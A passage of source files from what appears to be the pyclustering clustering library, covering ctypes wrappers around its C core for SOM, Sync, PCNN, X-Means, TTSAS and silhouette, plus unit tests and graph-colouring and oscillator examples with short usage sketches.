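```python
from pyclustering.core.metric_wrapper import metric_wrapper
from pyclustering.core.pam_build_wrapper import pam_build
from pyclustering.utils.metric import distance_metric, type_metric

sample = [[0.0, 0.0], [0.1, 0.1], [5.0, 5.0], [5.1, 4.9]]
metric = metric_wrapper.create_instance(distance_metric(type_metric.EUCLIDEAN))

try:
    medoids = pam_build(sample, 2, metric.get_pointer(), 'points')
except RuntimeError as error:
    print("C core rejected the request:", error)
```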
#### File: pyclustering/core/pcnn_wrapper.py
```python
from pyclustering.core.wrapper import *;
from pyclustering.core.pyclustering_package import package_builder, package_extractor, pyclustering_package;
class c_pcnn_parameters(Structure):
_fields_ = [
("VF", c_double),
("VL", c_double),
("VT", c_double),
("AF", c_double),
("AL", c_double),
("AT", c_double),
("W", c_double),
("M", c_double),
("B", c_double),
("FAST_LINKING", c_bool)
];
def pcnn_create(size, conn_type, height, width, params):
ccore = ccore_library.get();
c_parameters = c_pcnn_parameters();
c_parameters.VF = params.VF;
c_parameters.VL = params.VL;
c_parameters.VT = params.VT;
c_parameters.AF = params.AF;
c_parameters.AL = params.AL;
c_parameters.AT = params.AT;
c_parameters.W = params.W;
c_parameters.M = params.M;
c_parameters.B = params.B;
c_parameters.FAST_LINKING = params.FAST_LINKING;
ccore.pcnn_create.restype = POINTER(c_void_p);
pcnn_pointer = ccore.pcnn_create(c_uint(size), c_uint(conn_type), c_uint(height), c_uint(width), pointer(c_parameters));
return pcnn_pointer;
def pcnn_destroy(network_pointer):
ccore = ccore_library.get();
ccore.pcnn_destroy(network_pointer);
def pcnn_simulate(network_pointer, steps, stimulus):
ccore = ccore_library.get();
c_stimulus = package_builder(stimulus, c_double).create();
ccore.pcnn_simulate.restype = POINTER(c_void_p);
return ccore.pcnn_simulate(network_pointer, c_uint(steps), c_stimulus);
def pcnn_get_size(network_pointer):
ccore = ccore_library.get();
ccore.pcnn_get_size.restype = c_size_t;
return ccore.pcnn_get_size(network_pointer);
def pcnn_dynamic_destroy(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_destroy(dynamic_pointer);
def pcnn_dynamic_allocate_sync_ensembles(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_allocate_sync_ensembles.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_allocate_sync_ensembles(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_allocate_spike_ensembles(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_allocate_spike_ensembles.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_allocate_spike_ensembles(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_allocate_time_signal(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_allocate_time_signal.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_allocate_time_signal(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_get_output(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_get_output.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_get_output(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_get_time(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_get_time.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_get_time(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_get_size(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_get_size.restype = c_size_t;
return ccore.pcnn_dynamic_get_size(dynamic_pointer);
```
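The functions above follow a create/simulate/destroy lifecycle around raw C pointers, so the caller is responsible for cleanup of both the network and the returned dynamic. A minimal sketch under the assumption that the C core is available; the grid size, step count, and stimulus values are illustrative, and `pcnn_parameters`/`conn_type` come from the public `pyclustering.nnet` modules:
```python
from pyclustering.core.pcnn_wrapper import (pcnn_create, pcnn_simulate, pcnn_destroy,
                                            pcnn_dynamic_allocate_sync_ensembles,
                                            pcnn_dynamic_destroy)
from pyclustering.nnet.pcnn import pcnn_parameters
from pyclustering.nnet import conn_type

# 2x2 grid of oscillators with default parameters.
network = pcnn_create(4, conn_type.GRID_FOUR, 2, 2, pcnn_parameters())
dynamic = pcnn_simulate(network, 50, [10, 10, 0, 0])

ensembles = pcnn_dynamic_allocate_sync_ensembles(dynamic)

# Both pointers are owned by the caller and must be released explicitly.
pcnn_dynamic_destroy(dynamic)
pcnn_destroy(network)
```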
#### File: pyclustering/core/silhouette_wrapper.py
```python
from ctypes import c_double, c_longlong, c_size_t, POINTER
from pyclustering.core.converter import convert_data_type
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_builder, package_extractor
class silhouette_ksearch_package_indexer:
SILHOUETTE_KSEARCH_PACKAGE_INDEX_AMOUNT = 0
SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORE = 1
SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORES = 2
def silhoeutte(sample, clusters, pointer_metric, data_type):
pointer_data = package_builder(sample, c_double).create()
pointer_clusters = package_builder(clusters, c_size_t).create()
c_data_type = convert_data_type(data_type)
ccore = ccore_library.get()
ccore.silhouette_algorithm.restype = POINTER(pyclustering_package)
package = ccore.silhouette_algorithm(pointer_data, pointer_clusters, pointer_metric, c_data_type)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def silhoeutte_ksearch(sample, kmin, kmax, allocator, random_state):
random_state = random_state or -1
pointer_data = package_builder(sample, c_double).create()
ccore = ccore_library.get()
ccore.silhouette_ksearch_algorithm.restype = POINTER(pyclustering_package)
package = ccore.silhouette_ksearch_algorithm(pointer_data, c_size_t(kmin), c_size_t(kmax), c_size_t(allocator), c_longlong(random_state))
results = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return (results[silhouette_ksearch_package_indexer.SILHOUETTE_KSEARCH_PACKAGE_INDEX_AMOUNT][0],
results[silhouette_ksearch_package_indexer.SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORE][0],
results[silhouette_ksearch_package_indexer.SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORES])
```
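A brief usage sketch for the k-search wrapper above (note that the function names in this module are spelled `silhoeutte*`). The allocator code corresponds to `silhouette_ksearch_type` from the public silhouette module, as used in the tests earlier in this document; the sample and k-range are illustrative and the compiled C core is assumed:
```python
from pyclustering.core.silhouette_wrapper import silhoeutte_ksearch
from pyclustering.cluster.silhouette import silhouette_ksearch_type

sample = [[1.0, 1.0], [1.1, 0.9], [5.0, 5.0], [5.1, 5.2], [9.0, 9.0], [9.1, 8.9]]

# Search k from 2 up to 5 using K-Means as the underlying allocator.
amount, score, scores = silhoeutte_ksearch(sample, 2, 5, silhouette_ksearch_type.KMEANS, 42)
print("suggested amount of clusters:", amount, "with score:", score)
```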
#### File: pyclustering/core/som_wrapper.py
```python
from ctypes import Structure, c_longlong, c_uint, c_size_t, c_double, c_void_p, pointer, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_builder, package_extractor
class c_som_parameters(Structure):
"""!
@brief Description of SOM parameters in memory.
@details The following memory mapping is used in order to store the structure:
@code
struct som_params {
unsigned int init_type;
double init_radius;
double init_learn_rate;
double adaptation_threshold;
long long random_state;
};
@endcode
"""
_fields_ = [("init_type", c_uint),
("init_radius", c_double),
("init_learn_rate", c_double),
("adaptation_threshold", c_double),
("random_state", c_longlong)]
def som_create(rows, cols, conn_type, parameters):
"""!
@brief Creates a self-organized map using the C++ pyclustering library.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@param[in] conn_type (type_conn): Type of connection between neurons in the network (grid four, grid eight, honeycomb, function neighbour).
@param[in] parameters (som_parameters): Other specific parameters.
@return (POINTER) C-pointer to the self-organized feature map in memory.
"""
ccore = ccore_library.get()
c_params = c_som_parameters()
c_params.init_type = parameters.init_type
c_params.init_radius = parameters.init_radius
c_params.init_learn_rate = parameters.init_learn_rate
c_params.adaptation_threshold = parameters.adaptation_threshold
c_params.random_state = parameters.random_state or -1
ccore.som_create.restype = POINTER(c_void_p)
som_pointer = ccore.som_create(c_uint(rows), c_uint(cols), c_uint(conn_type), pointer(c_params))
return som_pointer
def som_load(som_pointer, weights, award, capture_objects):
"""!
@brief Load dump of the network to SOM.
@details Initializes the SOM using existing weights, the number of objects captured by each neuron, and the
objects captured by each neuron. Initialization is not performed if the weights are empty.
@param[in] som_pointer (POINTER): pointer to object of self-organized map.
@param[in] weights (list): weights that should be assigned to neurons.
@param[in] award (list): number of objects captured by each neuron.
@param[in] capture_objects (list): objects captured by each neuron.
"""
if len(weights) == 0:
return
ccore = ccore_library.get()
package_weights = package_builder(weights, c_double).create()
package_award = package_builder(award, c_size_t).create()
package_capture_objects = package_builder(capture_objects, c_size_t).create()
ccore.som_load(som_pointer, package_weights, package_award, package_capture_objects)
def som_destroy(som_pointer):
"""!
@brief Destroys self-organized map.
@param[in] som_pointer (POINTER): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_destroy(som_pointer)
def som_train(som_pointer, data, epochs, autostop):
"""!
@brief Trains self-organized feature map (SOM) using CCORE pyclustering library.
@param[in] data (list): Input data - list of points where each point is represented by list of features, for example coordinates.
@param[in] epochs (uint): Number of epochs for training.
@param[in] autostop (bool): Automatically terminate the learning process when adaptation no longer occurs.
@return (uint) Number of learning iterations.
"""
pointer_data = package_builder(data, c_double).create()
ccore = ccore_library.get()
ccore.som_train.restype = c_size_t
return ccore.som_train(som_pointer, pointer_data, c_uint(epochs), autostop)
def som_simulate(som_pointer, pattern):
"""!
@brief Processes an input pattern (no learning) and returns the index of the winning neuron.
@details Using the index of the winning neuron, the captured objects can be obtained via the capture_objects property.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
@param[in] pattern (list): input pattern.
@return Returns index of neuron-winner.
"""
pointer_data = package_builder(pattern, c_double).create()
ccore = ccore_library.get()
ccore.som_simulate.restype = c_size_t
return ccore.som_simulate(som_pointer, pointer_data)
def som_get_winner_number(som_pointer):
"""!
@brief Returns the number of winners at the last step of the learning process.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_winner_number.restype = c_size_t
return ccore.som_get_winner_number(som_pointer)
def som_get_size(som_pointer):
"""!
@brief Returns size of self-organized map (number of neurons).
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_size.restype = c_size_t
return ccore.som_get_size(som_pointer)
def som_get_capture_objects(som_pointer):
"""!
@brief Returns list of indexes of captured objects by each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_capture_objects.restype = POINTER(pyclustering_package)
package = ccore.som_get_capture_objects(som_pointer)
result = package_extractor(package).extract()
return result
def som_get_weights(som_pointer):
"""!
@brief Returns list of weights of each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_weights.restype = POINTER(pyclustering_package)
package = ccore.som_get_weights(som_pointer)
result = package_extractor(package).extract()
return result
def som_get_awards(som_pointer):
"""!
@brief Returns list of amount of captured objects by each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_awards.restype = POINTER(pyclustering_package)
package = ccore.som_get_awards(som_pointer)
result = package_extractor(package).extract()
return result
def som_get_neighbors(som_pointer):
"""!
@brief Returns list of indexes of neighbors of each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_neighbors.restype = POINTER(pyclustering_package)
package = ccore.som_get_neighbors(som_pointer)
result = package_extractor(package).extract()
return result
```
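Putting the functions above together, a hedged end-to-end sketch of the SOM lifecycle. It assumes the compiled C core and takes `som_parameters` and `type_conn` from the public `pyclustering.nnet.som` module; the map size, data, and epoch count are illustrative:
```python
from pyclustering.core.som_wrapper import (som_create, som_train, som_simulate,
                                           som_get_awards, som_destroy)
from pyclustering.nnet.som import som_parameters, type_conn

data = [[0.1, 0.2], [0.2, 0.1], [0.9, 0.8], [0.8, 0.9]]

# 2x2 map with four-neighbour grid connections and default parameters.
network = som_create(2, 2, type_conn.grid_four, som_parameters())
iterations = som_train(network, data, 100, True)

winner = som_simulate(network, [0.15, 0.15])  # index of the winning neuron
awards = som_get_awards(network)              # objects captured per neuron

som_destroy(network)
```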
#### File: pyclustering/core/sync_wrapper.py
```python
from pyclustering.core.wrapper import *
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor
def sync_create_network(num_osc, weight, frequency, type_conn, initial_phases):
ccore = ccore_library.get()
ccore.sync_create_network.restype = POINTER(c_void_p)
pointer_network = ccore.sync_create_network(c_uint(num_osc), c_double(weight), c_double(frequency), c_uint(type_conn), c_uint(initial_phases))
return pointer_network
def sync_get_size(pointer_network):
ccore = ccore_library.get()
ccore.sync_get_size.restype = c_size_t
return ccore.sync_get_size(pointer_network)
def sync_destroy_network(pointer_network):
ccore = ccore_library.get()
ccore.sync_destroy_network(pointer_network)
def sync_simulate_static(pointer_network, steps, time, solution, collect_dynamic):
ccore = ccore_library.get()
ccore.sync_simulate_static.restype = POINTER(c_void_p)
return ccore.sync_simulate_static(pointer_network, c_uint(steps), c_double(time), c_uint(solution), c_bool(collect_dynamic))
def sync_simulate_dynamic(pointer_network, order, solution, collect_dynamic, step, int_step, threshold_changes):
ccore = ccore_library.get()
ccore.sync_simulate_dynamic.restype = POINTER(c_void_p)
return ccore.sync_simulate_dynamic(pointer_network, c_double(order), c_uint(solution), c_bool(collect_dynamic), c_double(step), c_double(int_step), c_double(threshold_changes))
def sync_order(pointer_network):
ccore = ccore_library.get()
ccore.sync_order.restype = c_double
return ccore.sync_order(pointer_network)
def sync_local_order(pointer_network):
ccore = ccore_library.get()
ccore.sync_local_order.restype = c_double
return ccore.sync_local_order(pointer_network)
def sync_connectivity_matrix(pointer_network):
ccore = ccore_library.get()
ccore.sync_connectivity_matrix.restype = POINTER(pyclustering_package)
package = ccore.sync_connectivity_matrix(pointer_network)
connectivity_matrix = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return connectivity_matrix
def sync_dynamic_get_size(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_get_size.restype = c_size_t
return ccore.sync_dynamic_get_size(pointer_dynamic)
def sync_dynamic_destroy(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_destroy(pointer_dynamic)
def sync_dynamic_allocate_sync_ensembles(pointer_dynamic, tolerance, iteration):
if iteration is None:
iteration = sync_dynamic_get_size(pointer_dynamic) - 1
ccore = ccore_library.get()
ccore.sync_dynamic_allocate_sync_ensembles.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_allocate_sync_ensembles(pointer_dynamic, c_double(tolerance), c_size_t(iteration))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_allocate_correlation_matrix(pointer_dynamic, iteration):
analyse_iteration = iteration
if analyse_iteration is None:
analyse_iteration = sync_dynamic_get_size(pointer_dynamic) - 1
ccore = ccore_library.get()
ccore.sync_dynamic_allocate_correlation_matrix.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_allocate_correlation_matrix(pointer_dynamic, c_uint(analyse_iteration))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_get_output(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_get_output.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_get_output(pointer_dynamic)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_get_time(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_get_time.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_get_time(pointer_dynamic)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_calculate_order(pointer_dynamic, start_iteration, stop_iteration):
ccore = ccore_library.get()
ccore.sync_dynamic_calculate_order.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_calculate_order(pointer_dynamic, start_iteration, stop_iteration)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_calculate_local_order(pointer_dynamic, pointer_network, start_iteration, stop_iteration):
ccore = ccore_library.get()
ccore.sync_dynamic_calculate_local_order.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_calculate_local_order(pointer_dynamic, pointer_network, c_size_t(start_iteration), c_size_t(stop_iteration))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
```
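As with the other network wrappers, the Sync functions manage raw pointers explicitly, and the analysis helpers operate on the dynamic returned by a simulation call. A minimal static-simulation sketch, assuming the C core; the network size, coupling, and step values are illustrative, and the connection/initial/solver codes come from `pyclustering.nnet`:
```python
from pyclustering.core.sync_wrapper import (sync_create_network, sync_simulate_static,
                                            sync_dynamic_allocate_sync_ensembles,
                                            sync_dynamic_destroy, sync_destroy_network)
from pyclustering.nnet import conn_type, initial_type, solve_type

network = sync_create_network(5, 1.0, 0.0, conn_type.ALL_TO_ALL, initial_type.RANDOM_GAUSSIAN)
dynamic = sync_simulate_static(network, 10, 10.0, solve_type.FAST, True)

# Passing None for the iteration makes the wrapper analyse the last one.
ensembles = sync_dynamic_allocate_sync_ensembles(dynamic, 0.1, None)

sync_dynamic_destroy(dynamic)
sync_destroy_network(network)
```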
#### File: core/tests/ut_package.py
```python
import unittest
import numpy
from pyclustering.core.pyclustering_package import package_builder, package_extractor
from ctypes import c_ulong, c_size_t, c_double, c_uint, c_float, c_char_p
class Test(unittest.TestCase):
def templatePackUnpack(self, dataset, c_type_data=None):
package_pointer = package_builder(dataset, c_type_data).create()
unpacked_package = package_extractor(package_pointer).extract()
packing_data = dataset
if isinstance(packing_data, numpy.ndarray):
packing_data = dataset.tolist()
if isinstance(packing_data, str):
self.assertEqual(dataset, unpacked_package)
else:
self.assertTrue(self.compare_containers(packing_data, unpacked_package))
def compare_containers(self, container1, container2):
def is_container(container):
return isinstance(container, list) or isinstance(container, tuple)
if len(container1) == 0 and len(container2) == 0:
return True
if len(container1) != len(container2):
return False
for index in range(len(container1)):
if is_container(container1[index]) and is_container(container2[index]):
if not self.compare_containers(container1[index], container2[index]):
return False
elif is_container(container1[index]) == is_container(container2[index]):
if container1[index] != container2[index]:
return False
else:
return False
return True
def testListInteger(self):
self.templatePackUnpack([1, 2, 3, 4, 5])
def testListIntegerSingle(self):
self.templatePackUnpack([2])
def testListIntegerNegative(self):
self.templatePackUnpack([-1, -2, -10, -20])
def testListIntegerNegativeAndPositive(self):
self.templatePackUnpack([-1, 26, -10, -20, 13])
def testListFloat(self):
self.templatePackUnpack([1.1, 1.2, 1.3, 1.4, 1.5, 1.6])
def testListFloatNegativeAndPositive(self):
self.templatePackUnpack([1.1, -1.2, -1.3, -1.4, 1.5, -1.6])
def testListLong(self):
self.templatePackUnpack([100000000, 2000000000])
def testListEmpty(self):
self.templatePackUnpack([])
def testListOfListInteger(self):
self.templatePackUnpack([ [1, 2, 3], [4, 5, 6], [7, 8, 9] ])
def testListOfListDouble(self):
self.templatePackUnpack([ [1.1, 5.4], [1.3], [1.4, -9.4] ])
def testListOfListWithGaps(self):
self.templatePackUnpack([ [], [1, 2, 3], [], [4], [], [5, 6, 7] ])
def testListSpecifyUnsignedLong(self):
self.templatePackUnpack([1, 2, 3, 4, 5], c_ulong)
def testListSpecifyUnsignedSizeT(self):
self.templatePackUnpack([1, 2, 3, 4, 5], c_size_t)
def testListSpecifyDouble(self):
self.templatePackUnpack([1.1, 1.6, -7.8], c_double)
def testListOfListSpecifySizeT(self):
self.templatePackUnpack([ [1, 2, 3], [4, 5] ], c_size_t)
def testListOfListSpecifyUnsignedIntWithGaps(self):
self.templatePackUnpack([ [1, 2, 3], [], [4, 5], [], [] ], c_uint)
def testListOfListEmpty(self):
self.templatePackUnpack([ [], [], [] ])
def testListOfListOfListInteger(self):
self.templatePackUnpack([ [ [1], [2] ], [ [3], [4] ], [ [5, 6], [7, 8] ] ])
def testTupleInteger(self):
self.templatePackUnpack([ (1, 2, 3), (4, 5), (6, 7, 8, 9) ], c_uint)
def testTupleFloat(self):
self.templatePackUnpack([ (1.0, 2.0, 3.8), (4.6, 5.0), (6.8, 7.4, 8.5, 9.6) ], c_float)
def testTupleEmpty(self):
self.templatePackUnpack([(), (), ()])
def testNumpyMatrixOneColumn(self):
self.templatePackUnpack(numpy.array([[1.0], [2.0], [3.0]]), c_double)
def testNumpyMatrixTwoColumns(self):
self.templatePackUnpack(numpy.array([[1.0, 1.0], [2.0, 2.0]]), c_double)
def testNumpyMatrixThreeColumns(self):
self.templatePackUnpack(numpy.array([[1.1, 2.2, 3.3], [2.2, 3.3, 4.4], [3.3, 4.4, 5.5]]), c_double)
def testString(self):
self.templatePackUnpack("Test message number one".encode('utf-8'))
def testEmptyString(self):
self.templatePackUnpack("".encode('utf-8'))
```
#### File: pyclustering/core/ttsas_wrapper.py
```python
from ctypes import c_double, POINTER;
from pyclustering.core.wrapper import ccore_library;
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder;
def ttsas(sample, threshold1, threshold2, metric_pointer):
pointer_data = package_builder(sample, c_double).create();
ccore = ccore_library.get();
ccore.ttsas_algorithm.restype = POINTER(pyclustering_package);
package = ccore.ttsas_algorithm(pointer_data, c_double(threshold1), c_double(threshold2), metric_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result[0], result[1];
```
#### File: pyclustering/core/xmeans_wrapper.py
```python
from ctypes import c_double, c_longlong, c_size_t, c_uint, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder
def xmeans(sample, centers, kmax, tolerance, criterion, alpha, beta, repeat, random_state, metric_pointer):
random_state = random_state or -1
pointer_data = package_builder(sample, c_double).create()
pointer_centers = package_builder(centers, c_double).create()
ccore = ccore_library.get()
ccore.xmeans_algorithm.restype = POINTER(pyclustering_package)
package = ccore.xmeans_algorithm(pointer_data, pointer_centers, c_size_t(kmax), c_double(tolerance),
c_uint(criterion), c_double(alpha), c_double(beta), c_size_t(repeat),
c_longlong(random_state), metric_pointer)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
```
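A hedged usage sketch for the X-Means wrapper above. The criterion code corresponds to `splitting_type` from the public module (used throughout the tests earlier in this document), `None` for `random_state` maps to -1 on the C side, and the metric pointer is built with the `metric_wrapper` helper defined earlier in this package; the data and parameter values are illustrative:
```python
from pyclustering.core.xmeans_wrapper import xmeans
from pyclustering.core.metric_wrapper import metric_wrapper
from pyclustering.cluster.xmeans import splitting_type
from pyclustering.utils.metric import distance_metric, type_metric

sample = [[1.0, 1.0], [1.2, 0.8], [5.0, 5.0], [5.1, 5.2]]
metric = metric_wrapper.create_instance(distance_metric(type_metric.EUCLIDEAN))

result = xmeans(sample, [[1.0, 1.0]], 10, 0.025,
                splitting_type.BAYESIAN_INFORMATION_CRITERION,
                0.9, 0.9, 1, None, metric.get_pointer())

# By the convention of the other wrappers here, clusters come first, then centers.
clusters, centers = result[0], result[1]
```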
#### File: gcolor/examples/hysteresis_examples.py
```python
from pyclustering.gcolor.hysteresis import hysteresisgcolor;
from pyclustering.utils.graph import read_graph, draw_graph;
from pyclustering.utils import draw_dynamics;
from pyclustering.samples.definitions import GRAPH_SIMPLE_SAMPLES;
def template_graph_coloring(filename, alpha, eps, steps, time, title = None, tolerance = 0.1, threshold_steps = 10):
if (title is None): title = filename;
graph = read_graph(filename);
network = hysteresisgcolor(graph.data, alpha, eps);
output_dynamic = network.simulate(steps, time);
draw_dynamics(output_dynamic.time, output_dynamic.output, x_title = "Time", y_title = "State");
clusters = output_dynamic.allocate_clusters(tolerance, threshold_steps);
for index in range(0, len(clusters)):
print("Color #", index, ": ", clusters[index]);
coloring_map = output_dynamic.allocate_map_coloring(tolerance, threshold_steps);
draw_graph(graph, coloring_map);
def graph_simple1():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_SIMPLE1, 1.2, 1.8, 2000, 20);
def graph_one_line():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_LINE, 1.2, 1.8, 2000, 20);
def graph_one_crossroad():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CROSSROAD, 1.2, 1.8, 2000, 20);
def graph_two_crossroads():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_TWO_CROSSROADS, 1.2, 1.8, 2000, 20);
def graph_full_interconnected1():
"Bad result - two vertices colored by the same color"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_FULL1, 1.2, 1.8, 2000, 20, tolerance = 0.05);
def graph_full_interconnected2():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_FULL2, 1.2, 1.8, 2000, 20, tolerance = 0.05);
def graph_one_circle1():
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE1, 1.1, 1.1, 2000, 20);
def graph_one_circle2():
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE2, 1.1, 1.1, 2000, 20);
def graph_one_circle3():
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE3, 1.1, 1.1, 2000, 20);
def graph_five_pointed_frame_star():
"Good result - not optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_FIVE_POINTED_FRAME_STAR, 1.1, 1.4, 3000, 30);
graph_simple1();
graph_one_line();
graph_one_crossroad();
graph_two_crossroads();
graph_full_interconnected1();
graph_full_interconnected2();
graph_one_circle1();
graph_one_circle2();
graph_one_circle3();
graph_five_pointed_frame_star();
```
#### File: gcolor/tests/ut_hysteresis.py
```python
import unittest;
from pyclustering.gcolor.hysteresis import hysteresisgcolor;
from pyclustering.utils.graph import read_graph;
from pyclustering.samples.definitions import GRAPH_SIMPLE_SAMPLES;
class Test(unittest.TestCase):
def templateTestColoring(self, filename, alpha, eps, steps, time):
graph = read_graph(filename);
network = hysteresisgcolor(graph.data, alpha, eps);
output_analyser = network.process(steps, time);
map_coloring = output_analyser.allocate_map_coloring(0.05, 20);
# Check number of colors
assigned_colors = set(map_coloring);
# Check validity of color numbers
for color_number in range(0, len(assigned_colors), 1):
assert color_number in assigned_colors;
# Check validity of colors
for index_node in range(len(graph.data)):
color_neighbors = [ map_coloring[index] for index in range(len(graph.data[index_node])) if graph.data[index_node][index] != 0 and index_node != index];
#print(index_node, map_coloring[index_node], color_neighbors, assigned_colors, map_coloring, "\n\n");
assert map_coloring[index_node] not in color_neighbors;
def testColoringSimple1(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_SIMPLE1, 1.2, 1.8, 1500, 15);
def testColoringCircle2(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE2, 1.1, 1.1, 1500, 15);
def testColoringFivePointedFrameStar(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_FIVE_POINTED_FRAME_STAR, 1, 1, 2500, 25);
def testColoringOneLine(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_LINE, 1.2, 1.8, 1500, 15);
def testColoringOneCrossroad(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CROSSROAD, 1.2, 1.8, 1500, 15);
def testColoringTwoCrossroads(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_TWO_CROSSROADS, 1.2, 1.8, 1500, 15);
```
#### File: nnet/examples/hhn_examples.py
```python
from pyclustering.nnet.dynamic_visualizer import dynamic_visualizer
from pyclustering.nnet.hhn import hhn_network, hhn_parameters
def template_dynamic_hhn(num_osc, steps, time, stimulus=None, params=None, separate=False, ccore_flag=False):
net = hhn_network(num_osc, stimulus, params, ccore=ccore_flag)
(t, dyn_peripheral, dyn_central) = net.simulate(steps, time)
amount_canvases = 1
if (isinstance(separate, list)):
amount_canvases = len(separate) + 2
elif (separate is True):
amount_canvases = len(dyn_peripheral[0]) + 2
visualizer = dynamic_visualizer(amount_canvases, x_title="Time", y_title="V", y_labels=False)
visualizer.append_dynamics(t, dyn_peripheral, 0, separate)
visualizer.append_dynamics(t, dyn_central, amount_canvases - 2, True)
visualizer.show()
def one_oscillator_unstimulated():
template_dynamic_hhn(1, 750, 100, separate=True, ccore_flag=False)
template_dynamic_hhn(1, 750, 100, separate=True, ccore_flag=True)
def one_oscillator_stimulated():
template_dynamic_hhn(1, 750, 100, [25], separate=True, ccore_flag=False)
template_dynamic_hhn(1, 750, 100, [25], separate=True, ccore_flag=True)
def three_oscillators_stimulated():
template_dynamic_hhn(3, 750, 100, [25] * 3, separate=True, ccore_flag=False)
template_dynamic_hhn(3, 750, 100, [25] * 3, separate=True, ccore_flag=True)
def two_sync_ensembles():
template_dynamic_hhn(4, 400, 200, [25, 25, 50, 50], separate=True, ccore_flag=False)
template_dynamic_hhn(4, 800, 200, [25, 25, 50, 50], separate=True, ccore_flag=True)
def ten_oscillators_stimulated_desync():
params = hhn_parameters()
params.w1 = 0
params.w2 = 0
params.w3 = 0
stimulus = [25, 25, 25, 25, 25, 11, 11, 11, 11, 11]
